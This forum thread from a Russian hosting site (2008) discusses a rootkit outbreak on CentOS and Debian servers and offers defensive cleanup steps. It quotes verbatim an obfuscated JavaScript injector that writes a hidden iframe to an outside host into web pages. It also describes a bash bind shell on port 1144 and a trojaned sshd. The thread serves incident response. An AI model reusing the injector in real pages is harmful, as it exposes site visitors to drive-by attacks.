Главная Статьи Форум Помощь Блоги Инструменты Контакты

Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в данную темуНачать новую тему
> Эпидемия руткитов
kit
сообщение 24.10.2008, 0:25
Сообщение #1


Активный участник
***

Группа: Главные администраторы
Сообщений: 39
Регистрация: 22.9.2008
Пользователь №: 2



За последние несколько дней произошёл ряд взломов серверов. Ломают непонятно через что, но с единственной целью - залить на все php html htm файлы скрипт с фреймом. Скрипт выглядит примерно так

Код
<script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>


Проявляется в появлении на страницах фрейма либо ошибками в закодированных скриптах. Зазенденные файлы говорят примерно такое
Код
Fatal error: Incompatible file format: The encoded file has format ID 0, which is too old in /path/to/script.php on line 0


На самом сервере видно, что биндится bash на порт 1144 и слушает команды. Для этого используется файл /sbin/misc, там же лежит /sbin/shs с битом suid. Возможно, есть ещё что-то. После заражения удаляются все логи, поэтому определить кто и что не представляется возможным. Все заражённые файлы меняют владельца на root.

Пока зарегистрированны взломы только CentOS, но, возможно, это только совпадение.
Неясно, также, эксплутируется ли сетевая уязвимость или через какой-то скрипт/сервис заливается руткит который затем получает привилегии рута. Есть также вариант что у всех пострадавших увели пароли. Если подтвердится, что уязвимости подвержен только CentOS - я склоняюсь к первому варианту.

Пока пострадавшим можно делать так:

Код
iptables -A INPUT -s YOUR_IP -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 22 -j DROP
iptables -A INPUT -p tcp -m tcp --dport 1144 -j DROP
/etc/init.d/iptables save
kill -9 `netstat -lnp|grep bash|sed "s/.*LISTEN//"|cut -f1 -d/`
chmod 000 /sbin/misc
mv /sbin/misc /sbin/misc.hck
chattr -aui /sbin/shs
chmod 000 /sbin/shs
mv /sbin/shs /sbin/shs.hck
cat > ant.pl << EOF
#!/usr/bin/perl
\$/=\n;
open F, "<\$ARGV[0]";
\$mass=<F>; close F;
\$mass=~ s! <html> <body><script>var source.*</html> </body>!!s;
open F, ">\$ARGV[0]"; print F \$mass; close F;
EOF
chmod u+x ant.pl
find /home/ -regextype posix-extended -regex '.*\.php|.*\.s?html?' -exec grep -l '<html> <body><script>var source' {} \; >/root/virlist
while read i; do ./ant.pl $i; echo $i; done < /root/virlist

YOUR_IP - это ваш IP с которого будете заходить в шелл. Можно выполнить несколько таких команд с разными IP если к серверу нужен доступ с разных адресов (например для админов хостинга).

Паттерн скрипта вполне может быть и другой, например <html> <body> без пробела между ними и или </html> и </body> поменяны местами. Т.е. если не помогает то, что я написал - открываете любой php или html файл и смотрите что там есть.

Команды
Код
iptables -A INPUT -s YOUR_IP -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 22 -j DROP
iptables -A INPUT -p tcp -m tcp --dport 1144 -j DROP
/etc/init.d/iptables save

рекомендую выполнить всем счастливым обладателям линуксов и постоянных IP(или хотя бы зараннее известного диапазона IP провайдера), независимо от заражения.


--------------------
Перейти в начало страницы
 
+Цитировать сообщение
Pentarh
сообщение 24.10.2008, 6:30
Сообщение #2


Новичок
*

Группа: Пользователи
Сообщений: 1
Регистрация: 24.10.2008
Пользователь №: 11



Цитата(kit @ 24.10.2008, 1:25) *
За последние несколько дней произошёл ряд взломов серверов. Ломают непонятно через что, но с единственной целью - залить на все php html htm файлы скрипт с фреймом. Скрипт выглядит примерно так

ы?
http://www.opennet.ru/opennews/art.shtml?num=18359
Перейти в начало страницы
 
+Цитировать сообщение
awa
сообщение 24.10.2008, 11:00
Сообщение #3


Новичок
*

Группа: Пользователи
Сообщений: 2
Регистрация: 24.10.2008
Пользователь №: 12



Было такое, на одном из серверов забыли потереть логи, выяснилось следующее:

Скорее всего заходят через какую-то уязвимость в ssh, после чего ставят sshd-руткит, позволяющий заходить и после смены пароля. Для этого в /dev загружается модифицированный openssh, там же собирается и устанавливается поверх родного. Родной копируется в /etc/rpm.

Видимо, там еще и какой-то кейлоггер, потому что через пару дней тем же образом взломали другой сервер, не на этой площадке, на который я ходил по ssh через взломаный.

rkhunter данный руткит не видит. Закрывать фаерволом порт 22 необходимо, но для нас это не подходит. Я скачал последний openssh и поставил его поверх этого, плюс отключил возможность заходить по ssh рутом.
Перейти в начало страницы
 
+Цитировать сообщение
kit
сообщение 24.10.2008, 12:40
Сообщение #4


Активный участник
***

Группа: Главные администраторы
Сообщений: 39
Регистрация: 22.9.2008
Пользователь №: 2



Появились взломы дебиана. cups был при этом был отключен. Заход, похоже, с первой попытки по ssh (лог auth.log остался, но может его и подправили). Или увели пароль или уязвимость в ssh.


--------------------
Перейти в начало страницы
 
+Цитировать сообщение
awa
сообщение 24.10.2008, 12:42
Сообщение #5


Новичок
*

Группа: Пользователи
Сообщений: 2
Регистрация: 24.10.2008
Пользователь №: 12



Цитата(kit @ 24.10.2008, 12:40) *
Появились взломы дебиана. cups был при этом был отключен. Заход, похоже, с первой попытки по ssh (лог auth.log остался, но может его и подправили). Или увели пароль или уязвимость в ssh.

Вообще у меня есть подозрение, что именно уводят пароль или заходят без пароля - у одного из наших сотрудников была привычка хранить у себя ключи и заходить рутом в один клик, лень пароли вводить.
Перейти в начало страницы
 
+Цитировать сообщение
Amon
сообщение 24.10.2008, 12:55
Сообщение #6


Новичок
*

Группа: Пользователи
Сообщений: 1
Регистрация: 24.10.2008
Пользователь №: 13



Цитата(kit @ 24.10.2008, 13:40) *
Появились взломы дебиана. cups был при этом был отключен. Заход, похоже, с первой попытки по ssh (лог auth.log остался, но может его и подправили). Или увели пароль или уязвимость в ssh.


Сервер мой. На десктопе аналогично использую Debian, пароль всегда вводил руками (10 букв нижний регистр не словарь). Шаблон виря установленого на страницы и метод лечения полностью совпадает с описаным. Учитывая массовость явления в подборе пасса сомневаюсь.

Перейти в начало страницы
 
+Цитировать сообщение

Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 

RSS Текстовая версия Сейчас: 19.8.2026, 0:26
© 2005-2009 AMhost.net All Rights Reserved.
Главная Статьи Форум Помощь Блоги
Инструменты Контакты